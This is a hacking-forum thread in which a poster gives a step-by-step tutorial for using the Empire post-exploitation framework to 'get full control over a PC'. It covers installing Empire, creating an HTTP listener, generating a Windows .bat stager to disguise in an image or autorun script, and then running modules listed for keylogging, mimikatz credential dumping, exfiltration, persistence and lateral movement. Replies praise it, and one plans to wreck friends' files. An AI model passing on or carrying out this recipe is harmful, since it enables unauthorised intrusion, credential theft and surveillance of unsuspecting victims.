DevNinja

Get full control over a PC EASY!

By DevNinja in Tutorials, Guides, etc.

Recommended Posts

DevNinja    22

DevNinja

Get full control over a PC EASY!

 

At the end of this tutorial, you will be able to get full control over the whole pc.

 

[hide]

Hello everyone, 

 

Let's start the tutorial now.

 

REQUIREMENTS

~ Linux(operating system)

~ server(Not required you can also run it from your home buts it's not safe)

 

SSH into your Linux server.

 

Then you will need to get the https://github.com/EmpireProject/Empire.git.

git clone https://github.com/EmpireProject/Empire.git

 

When it's done downloading CD into the folder.

cd Empire

 

 

Now you will need to install Empire.

sudo ./setup/install.sh

 

 

Installing can take op to 15MIN.

When it's done installing you will need to start Empire.

./empire

 

 

Now you should see something like this.

empire_main_menu.png

 

Now you will need to make a Listener.

listeners
uselistener http

 

 

Now you will need to set the host and the port

set Host Http://(IP):(PORT)
set Port (PORT)

 

 

and you also need to set a name 

set Name (NAME)

 

 

Now you need to execute it.

execute

 

 

Now only the virus is left.

back
back
usestager windows/launcher_bat
options

 

 

Now you will need to tell what Listener to use, and you can set the location you want to save your file.

set Listener (NAME)
set OutFile (Directory)
execute

 

 

Now Download the file on your local pc.

Now you can put the file in an image or set it on a user with an autorun script you can do what you want with it.

When some open the .bat file their pc name will pop up on the terminal.

back
agents

 

 

Now you will see all pc you have access to.

When you want to attack a pc type in terminal 

interact (NAME of the pc)

 

 

Now you can do what you want with it.

Now you can use modules against the pc

code_execution/invoke_dllinjection
code_execution/invoke_metasploitpayload
code_execution/invoke_ntsd
code_execution/invoke_reflectivepeinjection
code_execution/invoke_shellcode
code_execution/invoke_shellcodemsil
collection/ChromeDump
collection/FoxDump
collection/USBKeylogger*
collection/WebcamRecorder
collection/browser_data
collection/clipboard_monitor
collection/file_finder
collection/find_interesting_file
collection/get_indexed_item
collection/get_sql_column_sample_data
collection/get_sql_query
collection/inveigh
collection/keylogger
collection/minidump
collection/netripper
collection/ninjacopy*
collection/packet_capture*
collection/prompt
collection/screenshot
collection/vaults/add_keepass_config_trigger
collection/vaults/find_keepass_config
collection/vaults/get_keepass_config_trigger
collection/vaults/keethief
collection/vaults/remove_keepass_config_trigger
credentials/credential_injection*
credentials/enum_cred_store
credentials/invoke_kerberoast
credentials/mimikatz/cache*
credentials/mimikatz/certs*
credentials/mimikatz/command*
credentials/mimikatz/dcsync
credentials/mimikatz/dcsync_hashdump
credentials/mimikatz/extract_tickets
credentials/mimikatz/golden_ticket
credentials/mimikatz/keys*
credentials/mimikatz/logonpasswords*
credentials/mimikatz/lsadump*
credentials/mimikatz/mimitokens*
credentials/mimikatz/pth*
credentials/mimikatz/purge
credentials/mimikatz/sam*
credentials/mimikatz/silver_ticket
credentials/mimikatz/trust_keys*
credentials/powerdump*
credentials/sessiongopher
credentials/tokens
credentials/vault_credential*
exfiltration/egresscheck
exfiltration/exfil_dropbox
exploitation/exploit_eternalblue
exploitation/exploit_jboss
exploitation/exploit_jenkins
lateral_movement/inveigh_relay
lateral_movement/invoke_dcom
lateral_movement/invoke_executemsbuild
lateral_movement/invoke_psexec
lateral_movement/invoke_psremoting
lateral_movement/invoke_smbexec
lateral_movement/invoke_sqloscmd
lateral_movement/invoke_sshcommand
lateral_movement/invoke_wmi
lateral_movement/invoke_wmi_debugger
lateral_movement/jenkins_script_console
lateral_movement/new_gpo_immediate_task
management/disable_rdp*
management/downgrade_account
management/enable_multi_rdp*
management/enable_rdp*
management/get_domain_sid
management/honeyhash*
management/invoke_script
management/lock
management/logoff
management/mailraider/disable_security
management/mailraider/get_emailitems
management/mailraider/get_subfolders
management/mailraider/mail_search
management/mailraider/search_gal
management/mailraider/send_mail
management/mailraider/view_email
management/psinject
management/reflective_inject
management/restart
management/runas
management/shinject
management/sid_to_user
management/spawn
management/spawnas
management/switch_listener
management/timestomp
management/user_to_sid
management/vnc
management/wdigest_downgrade*
management/zipfolder
persistence/elevated/registry*
persistence/elevated/schtasks*
persistence/elevated/wmi*
persistence/elevated/wmi_updater*
persistence/misc/add_netuser
persistence/misc/add_sid_history*
persistence/misc/debugger*
persistence/misc/disable_machine_acct_change*
persistence/misc/get_ssps
persistence/misc/install_ssp*
persistence/misc/memssp*
persistence/misc/skeleton_key*
persistence/powerbreach/deaduser
persistence/powerbreach/eventlog*
persistence/powerbreach/resolver
persistence/userland/backdoor_lnk
persistence/userland/registry
persistence/userland/schtasks
privesc/ask
privesc/bypassuac
privesc/bypassuac_env
privesc/bypassuac_eventvwr
privesc/bypassuac_fodhelper
privesc/bypassuac_sdctlbypass
privesc/bypassuac_tokenmanipulation
privesc/bypassuac_wscript
privesc/getsystem*
privesc/gpp
privesc/mcafee_sitelist
privesc/ms16-032
privesc/ms16-135
privesc/powerup/allchecks
privesc/powerup/find_dllhijack
privesc/powerup/service_exe_restore
privesc/powerup/service_exe_stager
privesc/powerup/service_exe_useradd
privesc/powerup/service_stager
privesc/powerup/service_useradd
privesc/powerup/write_dllhijacker
privesc/tater
recon/find_fruit
recon/get_sql_server_login_default_pw
recon/http_login
situational_awareness/host/antivirusproduct
situational_awareness/host/computerdetails*
situational_awareness/host/dnsserver
situational_awareness/host/findtrusteddocuments
situational_awareness/host/get_pathacl
situational_awareness/host/get_proxy
situational_awareness/host/get_uaclevel
situational_awareness/host/monitortcpconnections
situational_awareness/host/paranoia*
situational_awareness/host/winenum
situational_awareness/network/arpscan
situational_awareness/network/bloodhound
situational_awareness/network/get_exploitable_system
situational_awareness/network/get_spn
situational_awareness/network/get_sql_instance_domain
situational_awareness/network/get_sql_server_info
situational_awareness/network/portscan
situational_awareness/network/powerview/find_foreign_group
situational_awareness/network/powerview/find_foreign_user
situational_awareness/network/powerview/find_gpo_computer_admin
situational_awareness/network/powerview/find_gpo_location
situational_awareness/network/powerview/find_localadmin_access
situational_awareness/network/powerview/find_managed_security_group
situational_awareness/network/powerview/get_cached_rdpconnection
situational_awareness/network/powerview/get_computer
situational_awareness/network/powerview/get_dfs_share
situational_awareness/network/powerview/get_domain_controller
situational_awareness/network/powerview/get_domain_policy
situational_awareness/network/powerview/get_domain_trust
situational_awareness/network/powerview/get_fileserver
situational_awareness/network/powerview/get_forest
situational_awareness/network/powerview/get_forest_domain
situational_awareness/network/powerview/get_gpo
situational_awareness/network/powerview/get_group
situational_awareness/network/powerview/get_group_member
situational_awareness/network/powerview/get_localgroup
situational_awareness/network/powerview/get_loggedon
situational_awareness/network/powerview/get_object_acl
situational_awareness/network/powerview/get_ou
situational_awareness/network/powerview/get_rdp_session
situational_awareness/network/powerview/get_session
situational_awareness/network/powerview/get_site
situational_awareness/network/powerview/get_subnet
situational_awareness/network/powerview/get_user
situational_awareness/network/powerview/map_domain_trust
situational_awareness/network/powerview/process_hunter
situational_awareness/network/powerview/set_ad_object
situational_awareness/network/powerview/share_finder
situational_awareness/network/powerview/user_hunter
situational_awareness/network/reverse_dns
situational_awareness/network/smbautobrute
situational_awareness/network/smbscanner
trollsploit/get_schwifty
trollsploit/message
trollsploit/process_killer
trollsploit/rick_ascii
trollsploit/rick_astley
trollsploit/thunderstruck
trollsploit/voicetroll
trollsploit/wallpaper
trollsploit/wlmdr

 

 

That are all modules to run a module juse type in teminal 

usemodule (The Module here)

 

 

for some mudeules you will need to set some optins 

if you need to set some options just type in terminal 

options

 

 

to execute the module type in terminal

execute

 

 

Now you can get full access to any pc.

[/hide]

Share this post

Link to post
Share on other sites

Urikens    1

Urikens

thanks sir I appreciate your help:)

Share this post

Link to post
Share on other sites

Leva38    0

Leva38

Я хочу знать, как это работает

Share this post

Link to post
Share on other sites

Varus    0

Varus

Get full control over a PC EASY!

 

At the end of this tutorial, you will be able to get full control over the whole pc.

 

 

 

This looks interesting :P

Share this post

Link to post
Share on other sites

Babylon9    0

Babylon9

intresting, will try out

i will try it out. thanks for shareing

Share this post

Link to post
Share on other sites

niggabig99    1

niggabig99

im boutta fucc wit my homies and jus delete all they hentai folders

Share this post

Link to post
Share on other sites

Fluxas    1

Fluxas

Get full control over a PC EASY!

 

At the end of this tutorial, you will be able to get full control over the whole pc.

 

 

Share this post

Link to post
Share on other sites

puffy009    2

puffy009

nice nice thank you so much bro

Share this post

Link to post
Share on other sites

Warzaa    0

Warzaa

i think its bad ebook

Share this post

Link to post
Share on other sites

RAYNSACKS    0

RAYNSACKS

Get full control over a PC EASY!

 

At the end of this tutorial, you will be able to get full control over the whole pc.

 

 

Share this post

Link to post
Share on other sites

Circada    0

Circada

Get full control over a PC EASY!

 

At the end of this tutorial, you will be able to get full control over the whole pc.

 

 

 

i kiss your elbow :fiesta:

Share this post

Link to post
Share on other sites

ApexHraje    0

ApexHraje

I want to know how it works, just experimental :) Thanks for your effort!

Share this post

Link to post
Share on other sites

aIuK    2

aIuK

thanks for sharin this my brother

Share this post

Link to post
Share on other sites

VaxX8f    5

VaxX8f

good I like it thanks

Share this post

Link to post
Share on other sites

thisfireburns    0

thisfireburns

Get full control over a PC EASY!

 

At the end of this tutorial, you will be able to get full control over the whole pc.

 

 

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go To Topic Listing